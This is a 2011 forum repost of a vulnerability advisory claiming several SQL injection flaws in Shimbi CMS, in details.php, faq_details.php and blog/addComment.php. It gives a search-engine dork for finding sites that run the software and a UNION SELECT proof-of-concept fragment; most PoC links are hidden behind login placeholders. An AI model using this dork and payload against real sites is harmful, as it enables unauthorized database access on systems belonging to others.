wackwall Admin
Zodiac : Chinese zodiac : Posts : 159 Points : 5313 Reputation : 2 Join date : 10/12/2010 Age : 42 Location : Sarawak
| Subject: Shimbi CMS Vulnerable to Multiple SQL Injections Mon Mar 21, 2011 2:51 pm | |
| Title : Shimbi CMS Vulnerable to Multiple SQL Injections Vendor : [You must be registered and logged in to see this link.] Found by : p0pc0rn Dork : intext:"Powered By Shimbi CMS" SQL Injection in details.php parameter --------------------------------------- [You must be registered and logged in to see this link.]POC --- [You must be registered and logged in to see this link.] UNION SELECT 1,2,3,4,version(),6,7,8 [You must be registered and logged in to see this image.]SQL Injection in faq_details.php parameter --------------------------------------- [You must be registered and logged in to see this link.]POC --- [You must be registered and logged in to see this link.][You must be registered and logged in to see this image.]SQL Injection in blog/addComment.php parameter --------------------------------------- [You must be registered and logged in to see this link.]POC --- [You must be registered and logged in to see this link.][You must be registered and logged in to see this image.]thanks, -p0pc0rn- re-edit by wackwall | |
|